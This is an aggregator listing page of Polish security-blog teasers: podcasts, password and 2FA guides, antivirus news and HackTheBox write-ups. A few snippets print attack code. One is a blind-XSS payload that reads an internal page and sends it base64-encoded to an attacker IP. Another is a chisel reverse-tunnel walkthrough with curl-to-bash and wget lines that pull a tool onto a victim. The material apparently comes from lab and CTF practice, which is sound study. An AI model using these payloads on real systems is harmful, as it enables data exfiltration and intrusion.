Serwisy SEC

Trendy w cyberbezpieczeństwie na rok 2021. Gość: Grzegorz Bąk - POIT 126

Trendy w cyberbezpieczeństwie na rok 2021. Gość: G...

3 lat temu Witam w sto dwudziestym szóstym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy są trendy w cyberbezpieczeństwie na rok 2021.Dziś moim gościem jest Grzegorz Bąk – Product Development Manager w Xopero Software, związany z backupem d...
Używamy managera haseł

Używamy managera haseł

3 lat temu Na przeczytanie potrzebujesz 5 minut(y). Według przeprowadzonego w 2020 roku badania przeciętny użytkownik Internetu wykorzystuje około 100 haseł, by logować się do mediów społecznościowych, sklepów internetowych czy serwisów streamingowych. Co zrobi...
Lista złośliwych domen CERT Polska, Mateusz Szymaniec CERT Polska/NASK

Lista złośliwych domen CERT Polska, Mateusz Szyman...

3 lat temu Podczas prezentacji omówimy sposób działania prowadzonej przez nas listy domen stron wyłudzających dane internautów. Pokażemy skąd pozyskujemy informacje na temat złośliwych treści, jak je weryfikujemy i jakie systemy stworzyliśmy do wsparcia tego pr...
Jak prosto wirusy rozbrajają zabezpieczenia Windows 10?

Jak prosto wirusy rozbrajają zabezpieczenia Window...

payload.pl 3 lat temu Tak prosto, iż czasem aż ciężko uwierzyć. W tym, wydawać by się mogło, zamkniętym systemie, niemal każdym aspektem bezpieczeństwa da się sterować poprzez jakieś API - tak aby każdy aspekt mógł być punktowo wyłączony i obsłużony przez komercyjne oprog...
Jak się nie da, jak się da — Windows 11

Jak się nie da, jak się da — Windows 11

3 lat temu Większość z nas na pewno słyszała o wymaganiach dla Windows 11, o ile chodzi o sprzęt. Spora część użytkowników rozczarowała się, sprawdzając, czy będą mogli zaktualizować swój sprzęt do najnowszego systemu od Microsoftu. Ale… jak się nie da, jak się...
Kolejny certyfikat VB100 dla Arcabit

Kolejny certyfikat VB100 dla Arcabit

3 lat temu Magazyn Virus Bulletin opublikował wyniki kolejnej serii testów systemu ochronnego, tym razem przeprowadzonych według nowej, bardziej restrykcyjnej procedury. Pakiet Arcabit Internet Security bez trudu osiągnął maksymalny wyniki. Oto zestawienie wyni...
Weryfikacja dwuetapowa (2FA): Jak zabezpieczyć konta w internecie dzięki uwierzytelniania dwuskładnikowego?

Weryfikacja dwuetapowa (2FA): Jak zabezpieczyć kon...

3 lat temu Weryfikacja dwuetapowa (2FA) - wszystko o uwierzytelnianiu dwuskładnikowym. Porównanie metod: e-mail, kody SMS, kody czasowe w aplikacji, klucz U2F. Co wybrać i jak zabezpieczyć konta? Sprawdzam!
Arcabit chroni Windows 11

Arcabit chroni Windows 11

3 lat temu Microsoft zaprezentował nową wersję systemu Windows 11. Pakiet Arcabit pracuje w nowym systemie bez zarzutu. Maszyny z Windows 11 dołączyły do naszej farmy komputerów testowych Pierwsze spojrzenie na Windows 11: Arcabit zainstalowany, aktywny, gotowy...
Jak wirusy wyłączają filtr SmartScreen?

Jak wirusy wyłączają filtr SmartScreen?

payload.pl 3 lat temu Filtr SmartScreen wbudowany w Windows 10 pomaga chronić komputer przed złośliwymi stronami, oraz już pobranym złośliwym oprogramowaniem. Pomaga, dopóki nie zostanie przez takie oprogramowanie wyłączony. W tym artykule pokażemy, jak to robi realny wir...
CFP Secure 2021

CFP Secure 2021

3 lat temu Rozpoczynamy poszukiwanie prelegentów na tegoroczną edycję konferencji SECURE. Należysz do ludzi, którzy cenią sobie ciężką pracę i mierzenie się z wyzwaniami? Chcesz spotkać podobnych sobie zapaleńców, podzielić się wynikami pracy, poszukać inspirac...
Ciekawe linki [aktualizacja 27.06.2022]

Ciekawe linki [aktualizacja 27.06.2022]

payload.pl 3 lat temu W tym zbiorczym artykule publikujemy zbiór linków do narzędzi, tekstów i innych materiałów, które naszym zdaniem są warte przeczytania i mieszczą się w tematyce PAYLOAD, ale nie znajdziemy czasu w poświęcenie im osobnych artykułów.
#024: Nasze backupy

#024: Nasze backupy

3 lat temu Na przeczytanie potrzebujesz < 1 minutę. Ludzie dzielą się na tych, co robią backupy i na tych, co będą je robić ? Jest wiele różnych metod robienia backupów. Niektóre prostsze, niektóre trudniejsze, mniej lub bardziej paranoiczne. W tym odcinku.....
Winget – aktualizacja systemu innych firm jak Microsoft

Winget – aktualizacja systemu innych firm jak Micr...

4 lat temu Automatyczna aktualizacja systemu innych firm jak Microsoft to bez wątpienia pozytywne naśladownictwo rozwiązań rodem z Linux. Uruchamiamy cmd jako administrator i wykonujemy polecenie: winget upgrade –all Fajna sprawa 😉.
DNS: co to jest? Jak działa? Jak wybrać i zmienić DNS na bezpieczne?

DNS: co to jest? Jak działa? Jak wybrać i zmienić ...

4 lat temu Co to są serwery DNS? Jak działają? Co mają wspólnego z bezpieczeństwem, prywatnością i cenzurą w sieci? Jak wybrać i zmienić DNS-y?
Jak wirusy wyłączają Windows Defendera?

Jak wirusy wyłączają Windows Defendera?

payload.pl 4 lat temu Pewnie niejednokrotnie czytałeś artykuły o tym, iż Windows Defender jest najlepszym (czy wręcz jedynym potrzebnym) programem antywirusowym, bo jest ściśle zintegrowany z Windows. A z drugiej strony teksty, iż antywirusy komercyjne biją go na głowę. K...
Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyński - POIT 116

Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyńsk...

4 lat temu Witam w sto szesnastym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest cyfrowa suwerenność Europy.Dziś moim gościem jest Marcin Zmaczyński – Head of Marketing CEE w Aruba Cloud. Doświadczony manager odpowiedzialny za rozwiązan...
ARP poisoining + AS-REQ cracking

ARP poisoining + AS-REQ cracking

4 lat temu Dzień dobry. Dziś chciałbym poruszyć temat bezpieczeństwa sieci lokalnych i pokazać jeden z kilku tzw. low-hanging fruits, po które łatwo sięgnąć gdy znajdziemy się już w interesującym dla nas segmencie sieci: LLMNR NBNS (NetBIOS Name Service) ARP po...
Fastify + Hotwire - nowy (lepszy?) pomysł na frontend

Fastify + Hotwire - nowy (lepszy?) pomysł na front...

4 lat temu Obstawiam, iż 90% aktualnie tworzonych aplikacji opiera się na podział frontend, backend i przesył danych pomiędzy nimi w postaci JSON'a. Frontend prosi o dane i gdy je otrzymuje, to odpowiednio modyfikuje wygląd strony. A może można przesyłać coś in...
Planujemy wielki atak – wstęp

Planujemy wielki atak – wstęp

payload.pl 4 lat temu Tym artykułem rozpoczynamy nowy cykl, w którym objaśnimy krok po kroku, w jaki sposób zabrać się za zaatakowanie i wyprowadzenie danych z większej firmy - ale zanim przejdziemy do konkretów, musimy sobie wyjaśnić kilka podstawowych spraw.
Czemu, jak wpisuję błędne hasło przy logowaniu do banku, system nie wyświetla błędu?

Czemu, jak wpisuję błędne hasło przy logowaniu do ...

4 lat temu Na przeczytanie potrzebujesz 3 minut(y). Nasza czytelniczka Magda (imię zmienione) korzysta z bankowości internetowej jednego z polskich banków. Zgodnie z naszymi radami używa skomplikowanego, unikalnego hasła i dwuskładnikowego uwierzytelnienia(PUSH...
Co to jest VPN? 8 porad jak wybrać VPN, aby być bezpiecznym w Sieci

Co to jest VPN? 8 porad jak wybrać VPN, aby być be...

4 lat temu Kompendium wiedzy o VPN: Co to jest? Jak działa? Dlaczego warto używać VPN? Jak wybrać odpowiedni VPN? + dodatkowo moja rekomendacja najlepszego VPN-a.
Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170

Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170...

4 lat temu Cześć ? Poniższy wpis stanowi kontynuację poprzedniego artykułu o Windows Defenderze. W poprzednim artykule udało się nam doprowadzić do sytuacji w której możemy swobodnie usuwać zawartości wybranych przez nas folderów. W tym odcinku postaramy się pó...
Nowa wersja programu Arcabit

Nowa wersja programu Arcabit

4 lat temu Trochę to trwało, mnóstwo programisto-testero-roboczogodzin upłynęło, ale już jest - całkowicie nowa wersja programu Arcabit.Udostępniliśmy również mechanizm szybkiej, automatycznej migracji do najnowszej wersji. Zachęcamy do zapoznania się z nową we...
10 lat więzienia dla cyberprzestępcy z grupy FIN7

10 lat więzienia dla cyberprzestępcy z grupy FIN7

4 lat temu Wydano wyrok na 35-latka pochodzenia ukraińskiego, który był członkiem zorganizowanej grupy cyberprzestępczej FIN7. Wyrok to 10 lat pozbawienia wolności. Dodatkowo sędzia nakazał zapłacić 2,5 miliona dolarów odszkodowania. Grupa, w której uczestniczy...
Co z Rębaczami?

Co z Rębaczami?

4 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

4 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

4 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Sprawdź, czy wyciekł twój telefon

Sprawdź, czy wyciekł twój telefon

4 lat temu W weekend świat obiegła informacja, iż dostępna komercyjnie (i w darknecie) baza danych użytkowników Facebooka, zawierająca 533 milionów rekordów, została umieszczona za darmo w sieci. Zawierająca podstawowe informacje użytkowników baza ….
Rozmowa kontrolowana #53. Wywiad dla Z3S

Rozmowa kontrolowana #53. Wywiad dla Z3S

4 lat temu W świąteczną niedzielę redaktorzy serwisu Zaufana Trzecia Strona – Adam Haertle i Adam Lange – przeprowadzili wielotematyczną rozmowę z Pawłem Wilkiem. Można posłuchać i pooglądać odpowiedzi dotyczących programowania zorientowanego na dane, eDiscover...
Menedżer haseł: wszystko, co musisz wiedzieć o bezpiecznym zarządzaniu hasłami

Menedżer haseł: wszystko, co musisz wiedzieć o bez...

4 lat temu Jak zabezpieczyć swoje hasła przy pomocy menedżera haseł? Jak działają menedżery, co oferują, jak ich używać, który wybrać? Sprawdzam.
Infrastruktura IT dla Domu Maklerskiego – case study Navigator S.A.

Infrastruktura IT dla Domu Maklerskiego – case stu...

4 lat temu Sprawdź jakie środowisko IT przygotowaliśmy dla jednego z największych graczy w branży finansowej.
Handling Celery events (EN)

Handling Celery events (EN)

4 lat temu The code used in this article was written for Celery 5.0.5 but it should work with older versions as well (4.1.1 and higher). It’s available on GitHub. According to the Celery official documentation, a worker is able to generate...
Blind XSS Data Exfiltration

Blind XSS Data Exfiltration

4 lat temu cat 2.js var xhr=new XMLHttpRequest(); xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false); xhr.send();var xhr2=new XMLHttpRequest(); xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false); xhr2.send(); └...
Firestore - tworzenie, modyfikowanie i usuwanie danych

Firestore - tworzenie, modyfikowanie i usuwanie da...

4 lat temu Przy bazie danych równie istotne, jak pobieranie danych, jest również ich tworzenie. Do podstawowych operacji możemy zaliczyć tworzenie, edycję i usuwanie dokumentów oraz kolekcji. W przypadku Firestore jest kilka rozwiązań, które mogą zdziwić. Szcze...
Twoje hasła w końcu bezpieczne! Poradnik bezpieczeństwa haseł komputerowych

Twoje hasła w końcu bezpieczne! Poradnik bezpiecze...

4 lat temu Jak stworzyć silne, mocne i trudne do złamania hasło? Poznaj TOP 100 najpopularniejszych haseł w Polsce. Dowiedz się, jak łamane są hasła. Czy mierniki i testery siły hasła działają? Po co Ci kostka do gry i dlaczego musisz pamiętać...
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

4 lat temu
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

4 lat temu
Writeup: Maszyna HackTheBox Doctor

Writeup: Maszyna HackTheBox Doctor

4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.209 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
O WAF – Web Application Firewall z Arturem Pajkertem

O WAF – Web Application Firewall z Arturem Pajkert...

maciejkuchnik.pl 4 lat temu W tym odcinku Artur Pajkert wprowadza nas w zagadnienia związane z Web Application Firewall. W ponad godzinnym odcinku, Artur opowiada o rozwiązaniu, które każdego dnia chroni strony hostowane na cyberfolks.pl.
New Cheatsheet XSS 2021

New Cheatsheet XSS 2021

4 lat temu https://netsec.expert/posts/xss-in-2021/
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

4 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

4 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
"Nie będziemy negocjować" - casus CD Projekt RED

"Nie będziemy negocjować" - casus CD Projekt RED

sasmaczyliblogbezpiecznika.blogspot.com 4 lat temu Najpierw parę faktów 09.02.2021 roku CD Projekt RED poinformował, iż został zhakowany, część urządzeń zaszyfrowana, skradzione zostały kody źródłowe kluczowych gier oraz duża ilość dokumentów.Przestępcy zażądali okupu grożąc ujawnieniem skradzionych...
Writeup: Maszyna HackTheBox Worker

Writeup: Maszyna HackTheBox Worker

4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.203 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Worker] └──╼...
Writeup: Maszyna HackTheBox Omni

Writeup: Maszyna HackTheBox Omni

4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.204 3. Skanowanie i rozpoznanie Na początek użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Other/Omni] └──╼ $nm...
TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

TCP/UDP reverse tunnel, transported over HTTP, sec...

4 lat temu #### CHISEL INSTALL curl https://i.jpillora.com/chisel! | bash ## copy to victim server: www-data@passage:/tmp$ wget http://10.10.14.143/chisel wget http://10.10.14.143/chisel --2021-01-25 08:55:34-- http://10.10.14.143/chisel Connecting to 10.10.1...
Red Team Notes 2.0

Red Team Notes 2.0

4 lat temu https://dmcxblue.gitbook.io/red-team-notes-2-0/
Pihole – Cert Hole itp

Pihole – Cert Hole itp

4 lat temu DNS Hole od kilkunastu lat jest wykorzystywane do wielu celów. Zwykle do blokowania reklam na portalach, usług śledzących itp. Jednakże dożyliśmy takich czasów, iż DNS Hole coraz częściej wykorzystywane jest do zapewnienia bezpieczeństwa użytkownikó...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

4 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

4 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...

Popularne

Digitalizacja musi wzmocnić ludzkie zespoły

Digitalizacja musi wzmocnić ludzkie zespoły

2 dni temu 275
Wybory prezydenckie 2025. Ryszard Kalisz apeluje o pilne zwołanie posiedzenia PKW w związku z nieprawidłowościami przy liczeniu głosów

Wybory prezydenckie 2025. Ryszard Kalisz apeluje o pilne zwo...

6 dni temu 262
Sędzia Bogusław Nizieński. Wspomnienie mocno osobiste

Sędzia Bogusław Nizieński. Wspomnienie mocno osobiste

6 dni temu 250
Waldemar Kuczyński nie będzie przepraszał Jarosława Kaczyńskiego

Waldemar Kuczyński nie będzie przepraszał Jarosława Kaczyńsk...

6 dni temu 227
Dlaczego wygrał Nawrocki? Analiza węgierskiego tygodnika

Dlaczego wygrał Nawrocki? Analiza węgierskiego tygodnika

6 dni temu 226
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© Polityka 2025. Wszelkie prawa zastrzeżone.